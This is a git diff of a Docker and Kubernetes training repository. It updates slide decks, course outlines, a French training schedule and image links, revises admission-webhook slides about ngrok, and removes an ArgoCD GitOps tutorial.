(i.e. which pods have requests and limits for CPU and memory)
|
||||
|
||||
- Then check *utilization*
|
||||
|
||||
(i.e. actual resource usage)
|
||||
|
||||
- Possible tools: `kubectl`, plugins like `view-allocations`, Prometheus...
|
||||
|
||||
---
|
||||
|
||||
## Follow best practices
|
||||
|
||||
- We want to make sure that *all* workloads have requests
|
||||
|
||||
(and perhaps limits, too!)
|
||||
|
||||
- Depending on the workload:
|
||||
|
||||
- edit its YAML manifest
|
||||
|
||||
- adjust its Helm values
|
||||
|
||||
- add LimitRange in its Namespace
|
||||
|
||||
- Then check again to confirm that the job has been done properly!
|
||||
|
||||
---
|
||||
|
||||
## Be future-proof!
|
||||
|
||||
- We want to make sure that *future* workloads will have requests, too
|
||||
|
||||
- How can that be implemented?
|
||||
@@ -1,5 +0,0 @@
|
||||
#!/bin/sh
|
||||
for LINK in $(cat */*.md | sed -n 's/^\[\(.*\)\]:.*/\1/p' | sort | uniq -d); do
|
||||
grep '^\['"$LINK"'\]:' */*.md
|
||||
done
|
||||
|
||||
117
slides/highfive.html
Normal file
117
slides/highfive.html
Normal file
@@ -0,0 +1,117 @@
|
||||
<?xml version="1.0"?>
|
||||
<html>
|
||||
<head>
|
||||
<style>
|
||||
td {
|
||||
background: #ccc;
|
||||
padding: 1em;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<table>
|
||||
<tr>
|
||||
<td>Mardi 9 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 10 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Jeudi 11 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Vendredi 12 mai 2023</td>
|
||||
<td>
|
||||
<a href="1.yml.html">Docker Intensif</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Lundi 15 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 16 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 17 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Lundi 22 mai 2023</td>
|
||||
<td>
|
||||
<a href="2.yml.html">Fondamentaux Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 23 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 24 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Jeudi 25 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Vendredi 26 mai 2023</td>
|
||||
<td>
|
||||
<a href="4.yml.html">Kubernetes Avancé</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 30 mai 2023</td>
|
||||
<td>
|
||||
<a href="3.yml.html">Packaging d'applications pour Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 31 mai 2023</td>
|
||||
<td>
|
||||
<a href="3.yml.html">Packaging d'applications pour Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Jeudi 1er juin 2023</td>
|
||||
<td>
|
||||
<a href="3.yml.html">Packaging d'applications pour Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mardi 6 juin 2023</td>
|
||||
<td>
|
||||
<a href="5.yml.html">Opérer Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Mercredi 7 juin 2023</td>
|
||||
<td>
|
||||
<a href="5.yml.html">Opérer Kubernetes</a>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 103 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 22 KiB |
@@ -981,6 +981,10 @@
|
||||
# event: LISA
|
||||
# title: Deploying and Scaling Applications with Docker Swarm
|
||||
|
||||
#2015-09-24-strangeloop
|
||||
|
||||
|
||||
|
||||
- title: Introduction to Docker and Containers
|
||||
slides: intro-selfpaced.yml.html
|
||||
|
||||
|
||||
@@ -1,16 +1,16 @@
|
||||
https://prettypictures.container.training/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg
|
||||
https://prettypictures.container.training/containers/ShippingContainerSFBay.jpg
|
||||
https://prettypictures.container.training/containers/aerial-view-of-containers.jpg
|
||||
https://prettypictures.container.training/containers/blue-containers.jpg
|
||||
https://prettypictures.container.training/containers/chinook-helicopter-container.jpg
|
||||
https://prettypictures.container.training/containers/container-cranes.jpg
|
||||
https://prettypictures.container.training/containers/container-housing.jpg
|
||||
https://prettypictures.container.training/containers/containers-by-the-water.jpg
|
||||
https://prettypictures.container.training/containers/distillery-containers.jpg
|
||||
https://prettypictures.container.training/containers/lots-of-containers.jpg
|
||||
https://prettypictures.container.training/containers/plastic-containers.JPG
|
||||
https://prettypictures.container.training/containers/train-of-containers-1.jpg
|
||||
https://prettypictures.container.training/containers/train-of-containers-2.jpg
|
||||
https://prettypictures.container.training/containers/two-containers-on-a-truck.jpg
|
||||
https://prettypictures.container.training/containers/wall-of-containers.jpeg
|
||||
https://prettypictures.container.training/containers/catene-de-conteneurs.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/ShippingContainerSFBay.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/aerial-view-of-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/blue-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/chinook-helicopter-container.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/container-cranes.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/container-housing.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/containers-by-the-water.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/distillery-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/lots-of-containers.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/plastic-containers.JPG
|
||||
https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-1.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-2.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/two-containers-on-a-truck.jpg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/wall-of-containers.jpeg
|
||||
https://gallant-turing-d0d520.netlify.com/containers/catene-de-conteneurs.jpg
|
||||
|
||||
72
slides/intro-fullday.yml
Normal file
72
slides/intro-fullday.yml
Normal file
@@ -0,0 +1,72 @@
|
||||
title: |
|
||||
Introduction
|
||||
to Containers
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- containers/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/chat-room-im.md
|
||||
#- shared/chat-room-slack.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
-
|
||||
#- containers/Docker_Overview.md
|
||||
#- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
#- containers/Installing_Docker.md
|
||||
- containers/First_Containers.md
|
||||
- containers/Background_Containers.md
|
||||
#- containers/Start_And_Attach.md
|
||||
- containers/Naming_And_Inspecting.md
|
||||
#- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
- containers/Initial_Images.md
|
||||
-
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
-
|
||||
- containers/Container_Networking_Basics.md
|
||||
#- containers/Network_Drivers.md
|
||||
- containers/Local_Development_Workflow.md
|
||||
- containers/Container_Network_Model.md
|
||||
- shared/yaml.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
-
|
||||
- containers/Multi_Stage_Builds.md
|
||||
#- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
#- containers/Docker_Machine.md
|
||||
#- containers/Advanced_Dockerfiles.md
|
||||
#- containers/Buildkit.md
|
||||
#- containers/Init_Systems.md
|
||||
#- containers/Application_Configuration.md
|
||||
#- containers/Logging.md
|
||||
#- containers/Namespaces_Cgroups.md
|
||||
#- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
#- containers/Container_Engines.md
|
||||
#- containers/Pods_Anatomy.md
|
||||
#- containers/Ecosystem.md
|
||||
#- containers/Orchestration_Overview.md
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
73
slides/intro-selfpaced.yml
Normal file
73
slides/intro-selfpaced.yml
Normal file
@@ -0,0 +1,73 @@
|
||||
title: |
|
||||
Introduction
|
||||
to Containers
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- in-person
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
# - shared/logistics.md
|
||||
- containers/intro.md
|
||||
- shared/about-slides.md
|
||||
#- shared/chat-room-im.md
|
||||
#- shared/chat-room-slack.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
- - containers/Docker_Overview.md
|
||||
- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
- containers/Installing_Docker.md
|
||||
- containers/First_Containers.md
|
||||
- containers/Background_Containers.md
|
||||
- containers/Start_And_Attach.md
|
||||
- - containers/Initial_Images.md
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
- - containers/Container_Networking_Basics.md
|
||||
- containers/Network_Drivers.md
|
||||
- containers/Container_Network_Model.md
|
||||
#- containers/Connecting_Containers_With_Links.md
|
||||
- containers/Ambassadors.md
|
||||
- - containers/Local_Development_Workflow.md
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- shared/yaml.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Buildkit.md
|
||||
- containers/Init_Systems.md
|
||||
- containers/Application_Configuration.md
|
||||
- containers/Logging.md
|
||||
- containers/Resource_Limits.md
|
||||
- - containers/Namespaces_Cgroups.md
|
||||
- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
- - containers/Container_Engines.md
|
||||
- containers/Pods_Anatomy.md
|
||||
- containers/Ecosystem.md
|
||||
- containers/Orchestration_Overview.md
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
81
slides/intro-twodays.yml
Normal file
81
slides/intro-twodays.yml
Normal file
@@ -0,0 +1,81 @@
|
||||
title: |
|
||||
Introduction
|
||||
to Containers
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
#slidenumberprefix: "#SomeHashTag — "
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
content:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- containers/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/chat-room-im.md
|
||||
#- shared/chat-room-slack.md
|
||||
#- shared/chat-room-zoom-meeting.md
|
||||
#- shared/chat-room-zoom-webinar.md
|
||||
- shared/toc.md
|
||||
- # DAY 1
|
||||
- containers/Docker_Overview.md
|
||||
#- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
- containers/First_Containers.md
|
||||
- containers/Background_Containers.md
|
||||
- containers/Initial_Images.md
|
||||
-
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
-
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
-
|
||||
- containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Start_And_Attach.md
|
||||
- containers/Getting_Inside.md
|
||||
- containers/Resource_Limits.md
|
||||
- # DAY 2
|
||||
- containers/Container_Networking_Basics.md
|
||||
- containers/Network_Drivers.md
|
||||
- containers/Container_Network_Model.md
|
||||
-
|
||||
- containers/Local_Development_Workflow.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- shared/yaml.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
-
|
||||
- containers/Installing_Docker.md
|
||||
- containers/Container_Engines.md
|
||||
- containers/Init_Systems.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Buildkit.md
|
||||
-
|
||||
- containers/Application_Configuration.md
|
||||
- containers/Logging.md
|
||||
- containers/Orchestration_Overview.md
|
||||
-
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
#-
|
||||
#- containers/Docker_Machine.md
|
||||
#- containers/Ambassadors.md
|
||||
#- containers/Namespaces_Cgroups.md
|
||||
#- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
#- containers/Pods_Anatomy.md
|
||||
#- containers/Ecosystem.md
|
||||
@@ -20,21 +20,19 @@
|
||||
|
||||
## Use cases
|
||||
|
||||
- Defaulting
|
||||
Some examples ...
|
||||
|
||||
*injecting image pull secrets, sidecars, environment variables...*
|
||||
- Stand-alone admission controllers
|
||||
|
||||
- Policy enforcement and best practices
|
||||
*validating:* policy enforcement (e.g. quotas, naming conventions ...)
|
||||
|
||||
*prevent: `latest` images, deprecated APIs...*
|
||||
*mutating:* inject or provide default values (e.g. pod presets)
|
||||
|
||||
*require: PDBs, resource requests/limits, labels/annotations, local registry...*
|
||||
- Admission controllers part of a greater system
|
||||
|
||||
- Problem mitigation
|
||||
*validating:* advanced typing for operators
|
||||
|
||||
*block nodes with vulnerable kernels, inject log4j mitigations...*
|
||||
|
||||
- Extended validation for operators
|
||||
*mutating:* inject sidecars for service meshes
|
||||
|
||||
---
|
||||
|
||||
@@ -200,64 +198,6 @@
|
||||
|
||||
(the Node "echo" app, the Flask app, and one ngrok tunnel for each of them)
|
||||
|
||||
- We will need an ngrok account for the tunnels
|
||||
|
||||
(a free account is fine)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's ngrok?
|
||||
|
||||
- Ngrok provides secure tunnels to access local services
|
||||
|
||||
- Example: run `ngrok http 1234`
|
||||
|
||||
- `ngrok` will display a publicly-available URL (e.g. https://xxxxyyyyzzzz.ngrok.app)
|
||||
|
||||
- Connections to https://xxxxyyyyzzzz.ngrok.app will terminate at `localhost:1234`
|
||||
|
||||
- Basic product is free; extra features (vanity domains, end-to-end TLS...) for $$$
|
||||
|
||||
- Perfect to develop our webhook!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Ngrok in production
|
||||
|
||||
- Ngrok was initially known for its local webhook development features
|
||||
|
||||
- It now supports production scenarios as well
|
||||
|
||||
(load balancing, WAF, authentication, circuit-breaking...)
|
||||
|
||||
- Including some that are very relevant to Kubernetes
|
||||
|
||||
(e.g. [ngrok Ingress Controller](https://github.com/ngrok/kubernetes-ingress-controller)
|
||||
|
||||
---
|
||||
|
||||
## Ngrok tokens
|
||||
|
||||
- If you're attending a live training, you might have an ngrok token
|
||||
|
||||
- Look in `~/ngrok.env` and if that file exists, copy it to the stack:
|
||||
|
||||
.lab[
|
||||
|
||||
```bash
|
||||
cp ~/ngrok.env ~/container.training/webhooks/admission/.env
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Starting the whole stack
|
||||
|
||||
.lab[
|
||||
|
||||
- Go to the webhook directory:
|
||||
@@ -276,6 +216,28 @@ cp ~/ngrok.env ~/container.training/webhooks/admission/.env
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's ngrok?
|
||||
|
||||
- Ngrok provides secure tunnels to access local services
|
||||
|
||||
- Example: run `ngrok http 1234`
|
||||
|
||||
- `ngrok` will display a publicly-available URL (e.g. https://xxxxyyyyzzzz.ngrok.io)
|
||||
|
||||
- Connections to https://xxxxyyyyzzzz.ngrok.io will terminate at `localhost:1234`
|
||||
|
||||
- Basic product is free; extra features (vanity domains, end-to-end TLS...) for $$$
|
||||
|
||||
- Perfect to develop our webhook!
|
||||
|
||||
- Probably not for production, though
|
||||
|
||||
(webhook requests and responses now pass through the ngrok platform)
|
||||
|
||||
---
|
||||
|
||||
## Update the webhook configuration
|
||||
|
||||
- We have a webhook configuration in `k8s/webhook-configuration.yaml`
|
||||
@@ -581,23 +543,6 @@ Shell to the rescue!
|
||||
|
||||
(it should only allow values of `red`, `green`, `blue`)
|
||||
|
||||
---
|
||||
|
||||
## Coming soon...
|
||||
|
||||
- Kubernetes Validating Admission Policies
|
||||
|
||||
- Integrated with the Kubernetes API server
|
||||
|
||||
- Lets us define policies using [CEL (Common Expression Language)][cel-spec]
|
||||
|
||||
- Available in beta in Kubernetes 1.28 <!-- ##VERSION## -->
|
||||
|
||||
- Check this [CNCF Blog Post][cncf-blog-vap] for more details
|
||||
|
||||
[cncf-blog-vap]: https://www.cncf.io/blog/2023/09/14/policy-management-in-kubernetes-is-changing/
|
||||
[cel-spec]: https://github.com/google/cel-spec
|
||||
|
||||
???
|
||||
|
||||
:EN:- Dynamic admission control with webhooks
|
||||
|
||||
@@ -141,6 +141,12 @@ class: pic
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
@@ -151,12 +157,6 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
# The Kubernetes API
|
||||
|
||||
[
|
||||
|
||||
@@ -1,592 +0,0 @@
|
||||
# ArgoCD
|
||||
|
||||
- We're going to implement a basic GitOps workflow with ArgoCD
|
||||
|
||||
- Pushing to the default branch will automatically deploy to our clusters
|
||||
|
||||
- There will be two clusters (`dev` and `prod`)
|
||||
|
||||
- The two clusters will have similar (but slightly different) workloads
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## ArgoCD concepts
|
||||
|
||||
ArgoCD manages **applications** by **syncing** their **live state** with their **target state**.
|
||||
|
||||
- **Application**: a group of Kubernetes resources managed by ArgoCD.
|
||||
<br/>
|
||||
Also a custom resource (`kind: Application`) managing that group of resources.
|
||||
|
||||
- **Application source type**: the **Tool** used to build the application (Kustomize, Helm...)
|
||||
|
||||
- **Target state**: the desired state of an **application**, as represented by the git repository.
|
||||
|
||||
- **Live state**: the current state of the application on the cluster.
|
||||
|
||||
- **Sync status**: whether or not the live state matches the target state.
|
||||
|
||||
- **Sync**: the process of making an application move to its target state.
|
||||
<br/>
|
||||
(e.g. by applying changes to a Kubernetes cluster)
|
||||
|
||||
(Check [ArgoCD core concepts](https://argo-cd.readthedocs.io/en/stable/core_concepts/) for more definitions!)
|
||||
|
||||
---
|
||||
|
||||
## Getting ready
|
||||
|
||||
- Let's make sure we have two clusters
|
||||
|
||||
- It's OK to use local clusters (kind, minikube...)
|
||||
|
||||
- We need to install the ArgoCD CLI ([argocd-packages], [argocd-binaries])
|
||||
|
||||
- **Highly recommended:** set up CLI completion!
|
||||
|
||||
- Of course we'll need a Git service, too
|
||||
|
||||
---
|
||||
|
||||
## Setting up ArgoCD
|
||||
|
||||
- The easiest way is to use upstream YAML manifests
|
||||
|
||||
- There is also a [Helm chart][argocd-helmchart] if we need more customization
|
||||
|
||||
.lab[
|
||||
|
||||
- Create a namespace for ArgoCD and install it there:
|
||||
```bash
|
||||
kubectl create namespace argocd
|
||||
kubectl apply --namespace argocd -f \
|
||||
https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Logging in with the ArgoCD CLI
|
||||
|
||||
- The CLI can talk to the ArgoCD API server or to the Kubernetes API server
|
||||
|
||||
- For simplicity, we're going to authenticate and communicate with the Kubernetes API
|
||||
|
||||
.lab[
|
||||
|
||||
- Authenticate with the ArgoCD API (that's what the `--core` flag does):
|
||||
```bash
|
||||
argocd login --core
|
||||
```
|
||||
|
||||
- Check that everything is fine:
|
||||
```bash
|
||||
argocd version
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
🤔 `FATA[0000] error retrieving argocd-cm: configmap "argocd-cm" not found`
|
||||
|
||||
---
|
||||
|
||||
## ArgoCD CLI shortcomings
|
||||
|
||||
- When using "core" authentication, the ArgoCD CLI uses our current Kubernetes context
|
||||
|
||||
(as defined in our kubeconfig file)
|
||||
|
||||
- That context need to point to the correct namespace
|
||||
|
||||
(the namespace where we installed ArgoCD)
|
||||
|
||||
- In fact, `argocd login --core` doesn't communicate at all with ArgoCD!
|
||||
|
||||
(it only updates a local ArgoCD configuration file)
|
||||
|
||||
---
|
||||
|
||||
## Trying again in the right namespace
|
||||
|
||||
- We will need to run all `argocd` commands in the `argocd` namespace
|
||||
|
||||
(this limitation only applies to "core" authentication; see [issue 14167][issue14167])
|
||||
|
||||
.lab[
|
||||
|
||||
- Switch to the `argocd` namespace:
|
||||
```bash
|
||||
kubectl config set-context --current --namespace argocd
|
||||
```
|
||||
|
||||
- Check that we can communicate with the ArgoCD API now:
|
||||
```bash
|
||||
argocd version
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- Let's have a look at ArgoCD architecture!
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## ArgoCD API Server
|
||||
|
||||
The API server is a gRPC/REST server which exposes the API consumed by the Web UI, CLI, and CI/CD systems. It has the following responsibilities:
|
||||
|
||||
- application management and status reporting
|
||||
|
||||
- invoking of application operations (e.g. sync, rollback, user-defined actions)
|
||||
|
||||
- repository and cluster credential management (stored as K8s secrets)
|
||||
|
||||
- authentication and auth delegation to external identity providers
|
||||
|
||||
- RBAC enforcement
|
||||
|
||||
- listener/forwarder for Git webhook events
|
||||
|
||||
---
|
||||
|
||||
## ArgoCD Repository Server
|
||||
|
||||
The repository server is an internal service which maintains a local cache of the Git repositories holding the application manifests. It is responsible for generating and returning the Kubernetes manifests when provided the following inputs:
|
||||
|
||||
- repository URL
|
||||
|
||||
- revision (commit, tag, branch)
|
||||
|
||||
- application path
|
||||
|
||||
- template specific settings: parameters, helm values...
|
||||
|
||||
---
|
||||
|
||||
## ArgoCD Application Controller
|
||||
|
||||
The application controller is a Kubernetes controller which continuously monitors running applications and compares the current, live state against the desired target state (as specified in the repo).
|
||||
|
||||
It detects *OutOfSync* application state and optionally takes corrective action.
|
||||
|
||||
It is responsible for invoking any user-defined hooks for lifecycle events (*PreSync, Sync, PostSync*).
|
||||
|
||||
---
|
||||
|
||||
## Preparing a repository for ArgoCD
|
||||
|
||||
- We need a repository with Kubernetes YAML manifests
|
||||
|
||||
- You can fork [kubercoins] or create a new, empty repository
|
||||
|
||||
- If you create a new, empty repository, add some manifests to it
|
||||
|
||||
---
|
||||
|
||||
## Add an Application
|
||||
|
||||
- An Application can be added to ArgoCD via the web UI or the CLI
|
||||
|
||||
(either way, this will create a custom resource of `kind: Application`)
|
||||
|
||||
- The Application should then automatically be deployed to our cluster
|
||||
|
||||
(the application manifests will be "applied" to the cluster)
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's use the CLI to add an Application:
|
||||
```bash
|
||||
argocd app create kubercoins \
|
||||
--repo https://github.com/`<your_user>/<your_repo>`.git \
|
||||
--path . --revision `<branch>` \
|
||||
--dest-server https://kubernetes.default.svc \
|
||||
--dest-namespace kubercoins-prod
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking progress
|
||||
|
||||
- We can see sync status in the web UI or with the CLI
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's check app status with the CLI:
|
||||
```bash
|
||||
argocd app list
|
||||
```
|
||||
|
||||
- We can also check directly with the Kubernetes CLI:
|
||||
```bash
|
||||
kubectl get applications
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- The app is there and it is `OutOfSync`!
|
||||
|
||||
---
|
||||
|
||||
## Manual sync with the CLI
|
||||
|
||||
- By default the "sync policy" is `manual`
|
||||
|
||||
- It can also be set to `auto`, which would check the git repository every 3 minutes
|
||||
|
||||
(this interval can be [configured globally][pollinginterval])
|
||||
|
||||
- Manual sync can be triggered with the CLI
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's force an immediate sync of our app:
|
||||
```bash
|
||||
argocd app sync kubercoins
|
||||
```
|
||||
]
|
||||
|
||||
🤔 We're getting errors!
|
||||
|
||||
---
|
||||
|
||||
## Sync failed
|
||||
|
||||
We should receive a failure:
|
||||
|
||||
`FATA[0000] Operation has completed with phase: Failed`
|
||||
|
||||
And in the output, we see more details:
|
||||
|
||||
`Message: one or more objects failed to apply,`
|
||||
<br/>
|
||||
`reason: namespaces "kubercoins-prod" not found`
|
||||
|
||||
---
|
||||
|
||||
## Creating the namespace
|
||||
|
||||
- There are multiple ways to achieve that
|
||||
|
||||
- We could generate a YAML manifest for the namespace and add it to the git repository
|
||||
|
||||
- Or we could use "Sync Options" so that ArgoCD creates it automatically!
|
||||
|
||||
- ArgoCD provides many "Sync Options" to handle various edge cases
|
||||
|
||||
- Some [others](https://argo-cd.readthedocs.io/en/stable/user-guide/sync-options/) are: `FailOnSharedResource`, `PruneLast`, `PrunePropagationPolicy`...
|
||||
|
||||
---
|
||||
|
||||
## Editing the app's sync options
|
||||
|
||||
- This can be done through the web UI or the CLI
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's use the CLI once again:
|
||||
```bash
|
||||
argocd app edit kubercoins
|
||||
```
|
||||
|
||||
- Add the following to the YAML manifest, at the root level:
|
||||
```yaml
|
||||
syncPolicy:
|
||||
syncOptions:
|
||||
- CreateNamespace=true
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Sync again
|
||||
|
||||
.lab[
|
||||
|
||||
- Let's retry the sync operation:
|
||||
```bash
|
||||
argocd app sync kubercoins
|
||||
```
|
||||
|
||||
- And check the application status:
|
||||
```bash
|
||||
argocd app list
|
||||
kubectl get applications
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- It should show `Synced` and `Progressing`
|
||||
|
||||
- After a while (when all pods are running correctly) it should be `Healthy`
|
||||
|
||||
---
|
||||
|
||||
## Managing Applications via the Web UI
|
||||
|
||||
- ArgoCD is popular in large part due to its browser-based UI
|
||||
|
||||
- Let's see how to manage Applications in the web UI
|
||||
|
||||
.lab[
|
||||
|
||||
- Expose the web dashboard on a local port:
|
||||
```bash
|
||||
argocd admin dashboard
|
||||
```
|
||||
|
||||
- This command will show the dashboard URL; open it in a browser
|
||||
|
||||
- Authentication should be automatic
|
||||
|
||||
]
|
||||
|
||||
